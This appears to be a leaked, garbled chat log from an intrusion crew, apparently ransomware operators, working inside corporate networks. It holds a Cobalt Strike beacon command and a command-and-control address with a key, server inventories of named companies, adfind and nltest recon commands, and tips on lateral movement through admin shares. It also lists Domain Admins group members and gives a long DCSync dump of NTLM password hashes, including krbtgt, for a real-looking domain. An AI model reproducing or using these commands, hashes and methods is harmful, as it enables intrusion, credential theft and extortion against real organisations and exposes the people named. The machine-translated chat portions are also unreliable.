https://mediaeveryone.com/channel/general?msg=8Wui2GjymD9ouq2fJобмен experience peculiar) suddenly someone will have good thoughts on the problems of another let everyone understand the situation on the grids write directly here where to write? \For each of your grids write overall score for today, what's up, what's done, what worked, what did not work, questions, let's probably summarize the results todayhodu too long search, missed the opportunity to that another kobu try to `s?
AHyHax beacon> spawn https
``And the uses? For convenient and comfortable work. So that not to spend half a day on the settings. please```Thank you```
rcgem.com
192.254.71.150:20550
XG0zyAlTM5NMZ4DAYQs3EPK8Mttj1dKRqq6
``Gone to the offy I'll write back as I pick it up or should I throw it away too?
ap.panavision.com
==================


DC

SYD-DCON-02
SYD-DCON-01
AUS-DCON-01

----------------

EXCHANGE

SYD-EXCH-00
AKL-DCON-02

----------------

SQL

SYD-MSSQL-01
SYD-APPS-02
SYD-ALMS-01
SYD-ITAP-01

----------------

FILE SERVERS

AKL-FILE-01
AKL-FILE-02
SYD-FILE-01
MEL-FILE-02

----------------

WSUS

SYD-WSUS-01

----------------

could not find host

AUS-RDSB-01
SYD-ITNET-01
SYD-APIT-01 - timeout
SYD-APPS-01

----------------

HYPER-V

AKL-HYPV-01
SYD-HYPV-01
MEL-HYPV-01
AUS-DCON-02

----------------

PDQDeployService

SYD-PDQM-01

----------------

PRINT SERVER

SYD-PRNT-01

----------------

DPM

SYD-DPMS-02


----------------






??
SYD-ITMG-01 - orcestrator?

SCCM / WSUS often see other segments and 95 more servers which are not distributed
na.panavision.com
=================

DHCP

ATL-DHCP-01
NYC-DHCP-01
WDH-DHCP-01

-------------------

DC

DEN-DCON-02
DEN-DCON-01
WDH-DCON-02

-------------------

EXCHANGE

PNA-BURDC-02
PNA-ALBDC-01
NOL-DCON-02
PNA-WHEXCH-01
PNA-WHEXCH-02
GBL-EXCH-01

-------------------

MSSQL

WDH-SWSS-01
DEV-WIND-01
SQL-WH-03
GBL-SWSS-01

-------------------

VEAM

WDH-VEAM-01
WDH-VEAM-02

-------------------

SCCM

DEN-SCCM-01

-------------------

WSUS

DEN-WSUS-01

-------------------

FILE SERVERS

TOR-FILE-01
VAN-FILE-01
NOL-FILE-01
WDH-FILE-02
CHI-FILE-01
WDH-FILE-01
DAL-FILE-01

-------------------

Terminal Server License Servers

GBL-RDSB-01

-------------------

SQL

PNA-SQLREP-02
GBL-SQL-01
DEV-MSQL-01
DEN-ESQL-01
DEV-MSQL-02
DEV-SQLM-01
DEN-SQLP-01
DEN-SQLR-01
DEN-SQLU-01
DEN-SQLA-01
DEN-SQLM-01
DEN-SQLS-02
WDH-WIND-01
WDH-WIND-TST
WDH-PRNT-01
DEN-MDPM-01
WDH-NAVI-01

-------------------

Hyper-V


PNA-HYPV-06
PNA-HYPV-01
PNA-HYPV-03
HWD-HYPV-01
GBL-HYPV-01
PNA-HYPV-04
PNA-HYPV-02
PNA-HYPV-05
BUR-HYPV-01
VAN-HYPV-01
NYC-HYPV-01
ALB-HYPV-01
TOR-HYPV-01
CHI-HYPV-01
ATL-HYPV-01
NOL-HYPV-01
WDH-HYPV-01
PNA-HYPV-CL

-------------------

Sharepoint

DEN-SHAR-01
DEN-SHAR-02
DEV-SHAR-01
DEN-SHAR-03
DEN-APPS-02
DEN-PVSN-01
DEV-MSPS-16

-------------------

RDS

GBL-RDSH-03
GBL-RDSH-01
GBL-RDSH-02
GBL-RDSH-04
DEN-RDS-01
DEN-RDS-02
DEV-MSGP-01

-------------------

Disabled Servers

DEN-APPS-01
DEN-ENGS-01
DEV-GPER-01
ENG-WH-01X
EREQDEV
PNA-APPFS-01
PNA-RTRC-01
PNA-WEBAPPS-01
PNA-WHGP-01
DEV-MOOS-00

-------------------

Nutanix AHV.
(Virtualization is no longer a complex layer of the IT stack that is licensed, deployed, and managed separately.  Nutanix AHV offers a secure, enterprise-grade virtualization solution that streamlines operations).

DEN-CMDB-01
DEN-DVOP-03
DEN-ECOM-01
DEN-EREQ-01
DEN-PDQS-01
DEN-RTRC-01
DEV-MIIS-01
EREQUEST
GBL-ADFS-01
GBL-BIGS-01
GBL-MSDS-01
GBL-TMDS-00
PNA-WHSBX-02

-------------------

Please check the name and try again

DEV-GPUG-01
GBL-SWAS-01
PNA-SP-01
WDH-OMSA-01

-------------------

FILESTORAGE?

(Azure Backup with antivirus)

PNA-ALBFS-01
PNA-BURFS-02
PNA-HWDFS-02
PNA-NYCFS-02
DEN-STFS-01

-------------------

HTTPD

WDH-CCTV-01

-------------------

SolarWinds

WDH-SWAS-01

-------------------


PNA-ATLFS-02 Request timed out.
WDH-WDSS-01 Request timed out.
```shell adfind.exe -b dc=standards,dc=com,dc=au -f "(objectcategory=organizationalUnit)" > C:\Programdata\standards_ad_ous.txtshell nltest /dclist:c360.losal est@user1 @user3 catch it should be careful because it is quite a lot of flubbishitsya so, 3 times in a row run, admins will burn the network load and throw all)server and user OS he checks the balls on each pc in the domain I was more about the algorithm itself `` ``.
performs two functions at once, if we start it from a user context and see immediately available ADMIN$ balloons - it means we are local admin there and can already move there
if there are no such machines in the network - at least we get a list of available balls for reading, which may contain information relevant to upgrade privileges
You understand how shuffinder works, don't you? and it's server subnets at this scale are better to scan /24. So you need 20 domains, take off the ad_computer, ping the servers and connect the port? no, in 1 domain) in each domain?of the pluses, there is already YES, from the minuses there are still 19 trusts, I'll tell you when I runWe have automatic spoiling on such fruitovorov they pass you and see that you on 10 sessions in the cobs did not fructify, I pass @user1 @user3 sessions on the casexDseek ways to the cloud, look for the cradleshttp://arhangel.ru/fortune/online/taro/maps will prompt the right pathalgorithm is clear, but if the AV will be cloud and his server is not in the network?)hell certainly do not need to remove, but you can)well algorithm is clear, go fix the same, but is it enough for you?)portscans sorting this is it allDemolish hellDemolish the horses so what did we do on Saturday So, let's move on to the practice of networrkWhat a mistake, let's move on )who and where? @tl1 add us to their chatGood morning:space_invader: good morning to all
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator bkadmin bkgrant
bknoticing bkupexec casey.covello
CMAdmin DCUser executive
jimi.bingham monitor.acct robert.nye
serviceacc SPCentral SQLAdmin
stanleyford trust tyler.terzigni
Vincent.Velardi
The command completed successfully.
```
 
```
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator BESAdmin bkadmin
bkgrant CMAdmin DCUser
robert.nye sharepointadmin spadmin
SPCentral SQLAdmin stanleyford
trust
The command completed successfully.
``````
[DC] 'grantweber.com' will be the domain
[DC] 'GWCADC2.grantweber.com' will be the DC server
[DC] Exporting domain 'grantweber.com'
502 krbtgt 15c319c968a55d7d1fa8fc9086fded2c 514
6132 GWWAEXCHANGE10$ 545d9532ab95be32e700ecfc7b500e69 8192
1001 IWAM_EXCHANGE03 3ff3411a7f9ff3a4f9856de7a592e666 66080
1004 EXCHANGE03$ e0f80d66c57605d0172ce85fb0a3eaa5 4096
1606 GWWA-EXCHANGE$ 70c8d55d9fd38d745e5c2fec07c48a7c 4096
2107 GWCAEXCHANGE1$ 36836a3e93cc34909122d1ffa215cabd 4096
2605 IWAM_GWCAEXCHANGE1$ 8060534b317ea48b1b8e1a8132919fbc 66080
2626 GWCAFILE1$ 77b15f9c41c04f41278c57031b7a4e0f 4096
2734 GhostACCTB241-PC 7d55e037e823346aec331580100db8eb 66048
2746 USBBOOT$ 6923fbee7d72c6085962057f6e0b7e93 4128
1675 GW-SHAREPOINT$ 207c55f020739dbeb7dbc242b7902dae 4096
3109 ACCT227-PC$ dec14618368d8acbd6672239f1ce5400 4096
3119 ACCT93$ 24be4e1193d82d7d386b0a49998fd5d0 4096
2701 gwscans$ 202a5a7042c3211b8ab6bd2a881c4da3 69632
3112 ACCT194$ 89f78cf00b99a1ab3683e2ea4b3763c0 4096
2769 ACCT171$ 46eced10b3f3b1f66d5bdc4b0834e3da 4096
2770 ACCTB45$ bba29665d27d53c8857bddd968c0185a 4096
3111 ACCT80$ ea762eafa745041d632095dca34642a9 4096
3118 ACCTC103$ 4d8ec7d625b5ae297e720e958aab2375 4096
1719 TRAIN-17$ e23f7bf247b5607d2a36fc32e23eefa0 4096
2787 ACCTB43$ 4b06b1b84a147cbc7ad764b62f5aa578 4096
2807 ACCT19PC$ 4a88e0ffefbc0a8b48cf3dd7bd127cb4 4096
1710 ACCT63PC$ c9f34a6a641cd99054ced1cad22614e9 4096
1727 ACCT22$ 942eb8af91a482cfc61c3e6855bff216 4096
1681 ACCTC54$ dedbe20070d81179f16184a9a840a8b7 4096
2800 TRAIN-11$ 398711106db9cee649a5a83f2f57b7e7 4096
1700 ACCTB9PC$ e13f7fafae80f2ff05cf2646bce4b37b 4096
2826 TRAIN-14$ 05ef4f47216c52fd8df0c3993106f56b 4096
1707 ACCTB64-PC$ 58db1e841b72ee05b382506ecfd74680 4096
1657 bkadmin 1b456a1caf1df68632fdf0a568652610 66048
3127 ACCTB16$ 6d398518b42d2f236e6961a5b7126a89 4096
3106 ACCT69-PC$ 128586aefd23412eba3b8c2a860092fb 4096
3130 ACCT96$ bf8ed6433b44b1e81715e32e06595aa6 4096
2866 ACCT24$ ba9255367edec9209abebb3097fbdf45 4128
3135 ACCTC116PC$ bc075e7a2d20c31fb6177a81a3cdb1b3 4096
2198 ACCTC183$ a3ac25d5d8c76ff30a20b049eea34e54 4096
2178 ACCTC118DP$ cfbbc5dd8c3701e936bb8d996dcfbc5e 4096
2247 BES$ 558e83a15f6c70662341212110231092b4 4096
2832 ACCT46$ bf86151a25ab99f99fb1ea128f334bab17b 4096
3143 GW-WA40-PC$ 61a0b8a712ed53ab374743f124c825ea 4096
1731 TRAIN-14C$ e476f5b444040653adbeb21f0fc692bb82 4096
3141 TRAIN-13D$ 3386e371695b7112116c838a9cc5e151 4096
3139 TRAIN-20$ 3eace7e847ad851bb4407f430930cf54 4096
3140 TRAIN-12B$ 671ec214a030d5cfcd033149453dcce7 4096
3123 TRAIN-12$ 2781b324ef3ef996849b1fa50bdee9b86 4096
2153 ACCT74$ adbb4fafd64da1bfd94143acd72dd969 4096
1725 TRAIN-01$ 89667119b31fb24097d66d8b33e09c 4096
2259 GW-CONSULT2$ 055ebf3da091f59606c419b1b4ec951d 4096
2184 ACCT75-PC$ 9fbdb81a6d004d8c92a90f90dccbc2cd 4096
1737 ACCT195-PC$ fe400a95c6c52062edd3dd0ad72ee53d 4096
1730 TRAIN-19$ bd4aa7f45817112328d656cdf712c507 4096
3137 ACCT17$ b0c61bb3562e499f297eb89c80e658f9 4096
2802 TRAIN-06$ 1a872d1740bbb272c8ad32ef128f1ef5 4096
1686 ACCTB20-PC$ 7b8346c3e2b303b7d1d3476f459db9d9b 4096
3117 ACCT191-PC$ cfbf9696af17fde734317936be8b0ccf 4096
2831 ACCT97-PC$ 2b10f55e38b2cc135173e5cf43a1a3 4096
2270 ACCT153$ b646cd4b0c984a6892e5228b8e1fbf17 4096
3134 ACCT44PC$ af7f8f58f191c052eb80b4e078196884 4096
3149 GW-CONSULT5$ 79081eff247d3cea808aa9d30ebad8f2 4096
2779 ACCT148-PC$ d9c7529010a4271fee071442f48386fd 4096
1706 ACCT76PC$ a62180c29d4df647416fde0002e92f9f 4096
2808 ACCT5PC$ 43f8e0437b5a018bd4633a7288e853fb 4096
1669 bkgrant 89b9cc0a76316bca09be51763145cc2b 66048
2781 ACCT145-PC$ 0a15008fbae6ba396cf10faf1e8715b0 4096
3158 GW-WA83-PC$ dc3e927b46b9d310f5027b0083a67428 4096
1676 ACCTD106-PC$ 7117b9bb9daa4348d1566ad2f05e092a 4096
2194 ACCT98-PC5$ a3c07467dcd86d28a9f254e6d40641a 4096
2943 ACCTC104-VM$ 0fe5402b11b396b44bb8d0f02fc5fb79 4096
2924 DASHBOARD4-PC$ dcc270a001f9b80eb6170cd4ccb4770a 4096
2159 ACCT20-PC$ 5b4fe92a20406f1ec2942b4ba0e957cb 4096
2186 ACCT66PC$ b5aaa9095367e189f7bb06f38e1afdea 4096
3138 ACCT55-PC$ eb8812429e99d963312d1363944a819b 4096
1691 GW-SPARE-PC$ d9f836e4d163e51a629d2e7fd92c0460 4096
3153 SACCT70$ 473b1988586c6e49424c4bae90d280a9 4096
2865 ACCTB16-PC$ ff044c8f5e7d4e80f385a8353b7a59 4096
3614 SACCT72-PC$ 2751ea513718f3c6d6ea3440e6cc5f16 4096
3132 ACCT176-PC$ 73699d27c53f7c0182f1e33f28014452 4096
2859 eotrain 95e64555a2bf0b30973deb446ff3e11c 512
2240 ACCT77D$ 24e83f0bf7d3237a044d2d91df038fa3 4096
3032 TST9999 865bbdd57f5b35fc818f6bcc3f59385a 66048
2292 DASHBOARD3$ b95009ffaf7090efabed7f229f493029 4096
6105 nas$ 5b93de3dabca9e3062bdad9f75cfc537 69632
3124 ACCT219-PC$ ec893c500bb3fd1489a496b64e91551a 4096
2313 GWITLT$ 9e5132cebd7fe17415dac9c832b3909b 4096
2771 ACCT196-PC$ 8a90c50a38df3b2cf5ad8fd23627cb54 4096
2944 REMOTEACCESS-PC$ a7080819ef6f74062649415902983cf2 4096
2855 ACCT73PC$ 3a0695bf4e005bee82b72264e49dbc85 4096
2320 ACCT341-PC$ 0b5003a7f59e07f551e5dd346409b3b6 4096
2331 ACCTB83-PC$ b4b0fa9037999f90d18cb91eb90fefd9 4096
1680 ACCT98-PC$ 6128093c6364040240186320c947571d 4096
2886 ACCT49-PC$ b689b0de734c4a454e5d85bf5fd54c9c 4096
1749 GW-CONSULT8-PC$ af07a5d39c075f1ef37ce4e3d82fd782 4096
2814 ACCT246-PC$ cc5f92e211a820c3cabec397d4319810 4096
2985 ACCT84$ 025e4e17b33016be4dede1cb44c6789d 4096
1769 LEGAL2-LT$ c5f1e1fc78d9b296016f6ef31f102d41 4096
1733 ACCTC116-PC$ aa5a3c9def811f9a6f2ad80655da574f 4096
2960 STAN-PC$ 13b4b66d374bedcedc4c9c4e989a203d 4096
2337 ACCT355-PC$ 04693b82dee990a7365768ed0182b7be 4096
2340 ACCTC83-PC$ 27dbff84d9733e07cf35da46b1e68928 4096
5178 GW-CONSULT10-PC$ 320012a8fca583464a5232b41d515136 4096
1718 ACCT196$ 619f8c6bb7f03bdc306f630cfb0842f 4096
2277 GW-CONSULT6-PC$ 8fff385bcd2d4c6cb57c9495b215ac55 4096
2606 IUSR_GWCAEXCHANGE1 b8e69421675fe80aa3dc8d4cb5120d36 66080
1607 5C27EF39-7B4B-4E8C-8 bebff5378c6ca8ff84956200a3c64534 514
1647 7B4E2B22-520C-4020-8 dab3c74e73ca582a5dc57958acd0ced1 514
1763 7D67A2A6-7662-4B03-9 7e936f7600aed327fc27de7937f17197 514
2185 ACCTB24-PC$ a7b74a283da851596ccb3efe5b567b 4096
3615 SACSERVER$ 7670516c49886b2271b5864f6e065cae 4096
3121 ACCT55$ 05f0eb44aab98b4b7a6482bdb8ab3ca3 4096
3170 ACCT340-PC$ 899099863ba8f9078509960309d83171 4096
2837 ACCT92-PC$ a1ea7626ed1087619106c43cc9f206f4 4096
6106 LEGAL3-LT$ e6d5f6c8b0ce0e5ddab2d15b248932c2 4096
3215 ACCT401-PC$ 0418011e3a9f7440a82b5b17b5a298278 4096
2314 DIALERSTORAGE$ 84f8c877314b608d8b7f520f6a36d56b 4096
3136 ACCT238PC$ 5656acd14aaae65e59ce7e2e08b8b625 4096
2370 GWUSER$ 6241db503d2b2262aacabdcd3d2f0552 4098
3116 ACCT175-PC$ a27cc8cebd8cadded199f549d806b4f8 4096
1684 ACCT30-PC$ 50c5673058be5db877e22596f5f9d18d 4096
6134 ACCT397-PC$ 93bb816af6a3bfd95ebbe3786c9951e0 4096
3202 CONSULT11-PC$ 04688f389c97d4ad564eda3a751ecc1e 4096
2291 SUZAN$ dabd2c3a28776c9fcd328fea9d57f6a4 4098
2377 WSUS$ 6824190b32eda841f2d358c14fadd9f5 4096
3617 SACCT70-PC$ d87f4e43c4e8bae08253ab5ac78abe46 4096
2276 ACCT306-PC$ 1f36dcbf52528d4a13395279da723851 4096
3177 ACCT349-PC$ 8795e0a1bab9d1e6687b6040bc5dcdb0 4096
2861 ACCT50B-PC$ 2576983549aa546ef524698f317c7d85 4096
3628 SACCT119-PC$ 1216f93fa913fe69714bcd13115cef4c 4096
3016 SAC-4$ b6c76f5b306c3c6c004f0aa3ec0a2543 4096
2830 SACCT105-PC$ b963db81b8ba0c7974b7e8a1f84c16fb 4096
2780 ACCT17-PC$ 637e1678d38bde72331cfef0e9ec4cae 4096
2263 GW-CONSULT3$ d179883daa60d15d07564f5b6c7ada67 4096
7208 Jamal.Barksdale 86d88cd4b1d6696f7c52b13da4bb8243 66050
4110 ACCTC112$ ca94640122fb740408dccbd5214b182a 4096
3144 ACCTD118$ d5c2164af89c24d0412bc2be60262a16 4096
1671 ACCT216-PC$ 990fb5924a787f4c0582b02e5c1463e4 4096
2108 2AEDBB69-50BB-4AC3-8 9284a75a08f061a51c080f97c8c3fb4d 514
2815 65F4A425-FF56-464D-A 3512fb7e385018cae92abe0c5a098162 514
3152 ACCT300-PC$ b4a91004ddbc4f2fb00c846670328d40 4096
2768 ACCT45-PC$ a2a74e6c9e5e0549788661bb07c5fc88 4096
7125 SPICEWORKS$ 8e01c56bc53a966fe7e5838e69ddce21 4096
5177 ACCT395-PC$ e6b0fcee9a98949d7df94caf7fe84597 4096
7246 GW-CONSULT9$ dbc09aa5f8807e10153b9335abb0fd31 4096
6164 SACCT110-PC$ b5e2a571db568ae073edd6a2f55b58c3 4096
3637 SACCT126-PC$ 721fd4028a9f1f463cf1131d9bad8dba 4096
5179 SACCT96-PC$ ff081f47e9851a9e3f65b62805d68310 4096
3627 SACCT118-PC$ 8bcdbfbebb136f466cd04da3cf236e7b 4096
3235 SAC-1$ d7a561ca6f0f7f0e4e4cdc386be05005 4096
1692 ACCT29-PC$ cf50680e2fe05f3ea6be13bfc6bad6fa 4096
2334 ACCT359$ e47d7e9a97e78d4ee0e085400139a6ed 4096
3188 ACCT371-PC$ ace4b1e1214006fe4c5e12be17e64409 4096
2161 ACCTB29-PC$ 7a95cf9baf1f3be0e92da417d1b72f83 4096
1723 ACCT67-PC$ 6ef6ea9e27a0d4136ff04166057ed50f 4096
2773 ACCTB54-PC$ 9d0783647bb5f492b4e3b1e819f3ddc3 4096
3609 SACCT75-PC$ 81dc4823776ea053a2d93ca834fbdbca 4096
3606 SACCT80-PC$ e3088ddf49b0c3f1b9005e5cf1e3ecd 4096
2883 GWCONSULT1$ 524758e5ffc791143b9b8e182098e3ff 4096
1768 LOUNGE-PC$ c0b480bc86a863356500ea6e336ca2b2 4096
6171 GW-PAS-LAPTOP3$ 45fe3080fc95b843abf7923814e1227a 4096
3611 SACCT28-PC$ e98e89ca6d7176d69db9e22bd8b49def 4096
3619 ACCT105-PC$ 69333f3467d4789b123991d102d1dff4 4096
2792 ACCT205-PC$ bdf09cae26a2e27ab44e1c9d981baae5 4096
2344 SACCT86-PC$ 829552c07c9ea6a56223592e61f892c0 4096
3205 SACCT93-PC$ efae1f76fc318dd69b8819f8a23e5545 4096
3616 SACCT73-PC$ 56bfc8cc93d394f0389a4c6c84d5278a 4096
2187 ACCT165-PC$ ff10008a9f2f09b1af24a704102f1a9e 4096
3613 SACCT63-PC$ 7bc8cdaf91ef9acd70b7c863b8c7da57 4096
2369 GWITLOANER-LT$ cf7ccac9c413e2d37b005cdd8a27dc1a 4096
1738 CINDY-LAPTOP$ 570b01443004d9d4ce84e25927e4eb8a 4096
7252 GW-PAS-LAPTOP2$ a045f473828e0def06acf5dfc9f9abce 4096
2923 SAC-3$ 7c0f29729bc5464156d724e8c48395f9 4096
3151 ACCT73C$ 93f0e048eff4855fc997132c9980cc6d 4096
1708 ACCT7-PC$ 24bbd348fe0055bc462f8915cba1e270 4096
3605 ACCT80-PC$ d945250377f1f776aa34731f29509426 4096
2875 ACCTC118DP-PC$ 06c808fa066699224c03dc47b668db52 4096
3113 ACCT44-PC$ 3502d138825124bb09848eec69b33c3c 4096
2327 ACCT347-PC$ fb3537b383ab68acd3bb7b73e3fcae8d 4096
2803 ACCT40-PC$ ed6dc6ce56b73985b8ef982b3f0a2a5f 4096
2912 ACCT307-PC$ a24b95e025da02435e3aa74e9ccdb47f 4096
3133 ACCTC106-PC$ e710b904e142b5bc5936630a7c9ec10a 4096
3184 ACCT361-PC$ 12bfcf8e297ff4a62cbfb0df7cb07020 4096
2166 ACCTB103-PC$ ab2f6ef75d05063c419fe8745b77d7ba 4096
2167 ACCT4-PC$ d7f1ca2a7c14abe08edc3814aec0a9bc 4096
1734 ACCTB80-PC$ 7313e2599266f2a528d02f81af9860fe 4096
2268 ACCT320-PC$ 96d592a53a183b5e937b490af02410b9 4096
6147 ACCT405-PC$ 52af08d8500a76ceb828653294396321 4096
1728 EOCONFRENCE-PC$ 0f788c421dbbe142cdee041648cc6173 4096
2191 ACCT72-PC$ 46ee0872999973ca18ffc28d95df09ddc6 4096
6137 ACCT399-PC$ 988676a07b90130c3d61005ecce41f5c 4096
1705 ACCT65-PC$ 30ab09fdb753fa2f3093dd1e702b4353 4096
1714 ACCT173-PC$ 4ff6a3a5c5aa5c3e85ed496a5ea1fa1d 4096
6178 spAppPoolAcc 0e35475fb1d93d0d45723699b35a6296 66048
3610 SACCT64-PC$ c8bcd2d01e8c9886d7fb58f940d767aa 4096
2293 ACCT316-PC$ da1e3219104bc987f98598379bda921d 4096
2953 ACCT315-LT$ cfa6b2072a8b22e19a5c0a1f69a7596d 4096
1740 ACCTC101-PC$ af9468d9e2b4398e46507a2512991e4096
6122 SACCT92-PC$ ae6bd52548f7b201adbbfdc1b39e3d64 4096
3211 ACCTC241-PC$ a562ebf59f9ef66504c0a9753352f0c4 4096
4610 LVACCT219-PC$ a7c4b8a7b80d9831f58b71afc6fb9085 4096
1002 IUSR_EXCHANGE03 2ba13297e394c23bfdb2299b9b3bf064 66080
3608 SACCT67-PC$ a30e5cf2cb6d2a2900579203829ff88d 4096
3107 ACCT156-PC$ 0287018808261b64eace90b93b72edaa 4096
2939 GW-CONSULT9-PC$ e6ad080de7ae81e65c4e20c27c11d94d 4096
2783 ACCT192-PC$ 764a3ba2df40e6d655c034b155b69082 4096
2884 ACCT16-PC$ f868d5880ff2ae063ff920390e810e74 4096
1685 ACCT60-PC$ 010d2ca007c198323e3b3e9e09b70683 4096
2151 ACCTB15-PCN$ 3e8a23e3da1afc7a988d11d7dabd0f76 528384
2265 ACCT7796-PC$ 11fcefa4e2bf2c6b6a028790babaed33 4096
1764 MARYTEST-PC$ d18ad961b661eba8396b844d70eeacc9 4096
2867 ACCT24-PC$ d6682c44404cfd7e01b53aa9677291a5 4128
3180 ACCT360-PC$ b187c10e997401aedbe984520e66f971 4096
1750 DASHBOARD4$ 91dcd81addd835d1590c072e32503c53 4096
2789 ACCT77-PC$ f002df775f0d3daf8907bda66cde4dcb 4096
2170 ACCT178-PC$ a8f4f83c94c89fe4b88a1bda746aa44b 4096
2326 ACCT15-PCE$ 986cea938b0e76fd2b6370747545fa2b 4096
1299 trust 2cbdec5023a03c12a35444486f09ceab 66048
1752 ACCTC106PC$ c9a9c7339ada2df5b31901d69766f7a8 4096
2257 ACCT19-PC$ d209e127f45f7fdd71ad5116136d5f57 4096
2990 ACCT332-PC$ e70101994b1006d1444aa35812052800 4096
2324 ACCT344-PC$ 46e43f8632bae8b632ea83f0ed0ca508 4096
2817 ACCT166-PC$ a290a8d86a74eb4c84166c54537e471b 4096
3114 ACCTB10-PC$ c33865f3dd763031e096e54ee5045f15 4096
1758 ACCT323-PC$ c56310b1207934133ea7046aa2a75f2a 4096
3165 ACCT324-PC$ d55c832ebe8b39a58f468deb06d998ea 4096
1683 ACCT48-PC$ de9f69783be79c39052ec19121c841f9 4096
4612 LVACCT185-PC$ b3fa0979a75a0d41f7ff1edf74f0f0fd 4096
7343 JIMILT$ 5a089c75d4d7eda5bbdd7c2c8cbda4af 4098
3181 ACCT73-PC$ 00debc7dbe3f3638246af106c11f7b32 4096
2785 ACCT35-PC$ 6bfff919e97373199fe7a51f0c8b9e32 4096
3182 ACCT359-PC$ 4c9b94528fed629c5c70bed5424e8878 4096
3126 ACCTB56-PC$ 6ca08d49a7ddf764e2e89e04b99fe69b 4096
3219 ACCT404-PC$ 3d8f5558614bb9a014f6d004bf8e820f 4096
2243 ACCT154-PC$ 4dc470e2d83523eb9921579065232e0e 4096
2146 ACCT234-PC$ 968745c3a7ff443debf22bef1beaf9e6 4096
3105 ACCT50-PC$ 24959ec7c63eb80ec792f3f89d99579f 4096
3157 ACCT343-PC$ f17bbdbdb99d8fb5d5fb03306980709677 4096
3147 ACCTB131-PC$ 22dc6c485920432cad60f54d1d2898fc 4096
2372 SPENCERTABLET$ f6cc4d3309c06e842570cc9b858e6fef 4096
1679 ACCTB11-PC$ d57c9ec6ccf3dd7e04ebc4d128f77706 4096
1695 ACCT91-PC$ f459cf6d690274cb5e88b986e2fe747b 4096
2287 ACCT312-PC$ be7a01c2c5dd0b79ee5c7ce0d9173382 4096
7166 ACCTTYLER$ 82396e2f84ac7de6151b1864b4f7fb98 4096
2288 ACCT98B-PC$ 0b8519485909099448f281f7fb783cb615 4098
3284 TYLERGW$ d938f624f2c9088fc57449b4c0731224 4096
3209 TYLER-PC$ 4f0d4a4c8e37299e75c382f70ff51491 528384
1745 ACCT310-PC$ 829c3d89400d728a33cbf303064407c3 4096
6192 SUZAN-PC$ 2ba3dc186ad1624b29f63022127dae45 4096
3618 SACCT74-PC$ 8d14b1b9ffd2095ce48d9252c577ed14 4096
7397 LEAH-PC$ e35d5da75a941e5b28caaf341b46e7e7 4096
1751 LEGAL-CONSULTPC$ 1e699f95e48cefadf602a33c31e3d35d 4096
1742 ACCTCUMGT$ ddd8ce5cade4edb4fe4c9afbf2026038 4096
1754 ACCTB128-PC$ 7bda1d4e16e11bd8864322c330bf6f78 4096
2332 ACCT351-PC$ 34ae1686afa5016e3ae430af574cc54e 4096
3620 SACCT68-PC$ 40322c275234804ed9fe54e4801f650e 4096
3185 ACCT364-PC$ 0b2155393f4d1376bd09165ce9d2b703 4096
2188 ACCT47-PC$ dbbd4ab9077dd985262169065a6269c4 4096
2971 SACCT81-PC$ fd66cdcaaa559295268b75c9e0e7af4e 4096
7109 ACCT406-PC$ 53214a2704da24daa93ca13de12910c1 4096
3286 LEAH$ 1438e5c85a8a2c300b2972422c12c6e3 4096
3175 SACCT82-PC$ 721ec4d2fd06b2b554002adeef687fe1 4096
3129 LVACCT62-PC$ 78307992aebacbb276612ebc22e0363f 4096
2254 TREVORSIMMS-PC$ ecad1b0512ba84f74c59589c406f9712 4096
2269 MARYKEMPSKI-PC$ 4e91fe5907d54f3e7113b8c368674cbd 4096
7429 ed.lopez$ 376bb4419f11a3a18f76bf6ee2313e72 4096
2375 SUZAN-LT$ caea5162c19b6288e0b9901d001cdca4 4096
7430 cmservice$ 1ef5f75bf297e7ae2a4fe8d64de87ac 4096
2381 SACCT114-PC$ 41c7bc3018ee819fe766adfed814122f 4098
7424 EUREKA$ d02d57ba833c79c9800f9912f58d347f 4096
3635 SACCT125-PC$ ba2354e81ab8c8fc000f9e9479ff025d 4096
3630 SACCT121-PC$ 94606cbc50640a064da8a0f0d3d47177 4096
6197 SACCT111$ 91ee699a785b68cfb125f8b316380337 4096
7425 jon.depetro 089278e49fe7628e74f1bd6c1d2f7ebf 66050
7426 CMSupport ca112c4a89b7c9b6c78ce56d66af 66050
7421 CMAdmin 2c09e6e5f0e52434c8772b00531f465e 66050
7428 ed.lopez f10c34032c60c25480f25fe7955768e0 66050
7422 cmuser 2c09e6e5f0e52434c8772b00531f465e 66050
3178 ACCT350-PC$ 8fdd4c5396c54235114c5c051b523b01 4096
2962 ACCT193-PC$ 0c07a2c292ecce98784c01cf9da88959 4096
3122 ACCTD116-PC$ 612a1f87a34e429113ecb51f4f1cad92 4096
3634 SACCT124-PC$ a2a928d9e49d9ac918e8729ffe22ce31 4096
1690 ACCTB15PC$ d49ec91d827d833c6ab103b1d007900b 4096
3638 SACCT128-PC$ 0df8fb13c86efbaca14660d608c03853 4096
2345 SACCT88-PC$ f48c6eff4a8cdd3c9b63d631c7f4cdab 4096
2147 ACCT206-PC$ 991982aa4a7463db68d58722130da81e 4096
6117 ACCT381-PC$ 0c9f7accb9ae1901e3d016d4e60c106d 4096
1693 ACCT26$ cd67d4bd81b0808dc2f55e19e7d20d6e 4096
1759 DCUser 080047c7ab8205dfdf6498df928c3af1 66048
3291 MARY-PC$ a95722c065ddafe3bbe7477046e38bb5 4096
1713 ACCT229-PC$ 7aa4d7e6a901bffe67033399b698719e 4096
3277 ACCT2132-PC$ f11f183c2c928c63cc913faf6746c35f 4096
7386 GWLAPTOP-PC$ 26832f1189dd2e6b2f8ca1935aaab076 4096
2893 ACCT54-PC$ 8dd532bb60adf0976756a629b8eaebd5 4096
2373 TYLER$ 8c0692413e252a84b85f0af01f582abe 4096
3191 ACCT377-PC$ f1bb4775b403275ba50b13051e2266a4 4096
1682 ACCT6-PC$ 14da85d5ffa35fb244e186d6c1f665f5 4096
1698 ACCT88-PC$ 3fb5f45bc8132de034314b2468327372 4096
3195 ACCT379-PC$ 5f264ca4713d87bc63239ae19a05fb89 4096
6113 ACCT375-PC$ 0fd0a6711a9ee65315e3c72c1d192aee 4096
4109 AZACCT50-PC$ 4727c2f29f01c9772f37acf46a9d09c6 4096
2319 DCREMOTEAPP$ aec49c02c941a198c2a04325338fd7cd 4096
4106 AZACCT45-PC$ 09c861b5fe270a67673063af7a3f6b1e89 4096
2805 ACCT16$ b15969174a42c7bf47be94c368956988 4096
1701 ACCT212-PC$ 5de16206c919243089e4285f8bf4a880 4096
6158 ACCT314-LT$ 57e9576f91c79dfa311c571fb1b533ed 4096
